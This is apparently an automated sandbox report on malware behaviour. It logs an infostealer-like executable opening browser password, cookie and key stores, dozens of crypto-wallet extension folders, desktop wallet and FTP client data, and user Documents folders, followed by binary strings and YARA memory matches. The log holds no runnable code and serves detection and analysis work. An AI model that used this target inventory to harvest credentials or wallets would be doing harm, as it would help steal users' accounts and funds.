Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: 2ada66c192.exe Binary or memory string: WIN_81
Source: 2ada66c192.exe Binary or memory string: WIN_XP
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 2ada66c192.exe Binary or memory string: WIN_XPe
Source: 2ada66c192.exe Binary or memory string: WIN_VISTA
Source: 2ada66c192.exe Binary or memory string: WIN_7
Source: 2ada66c192.exe Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: Yara match File source: 00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2656254636.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2656059323.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2722206799.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
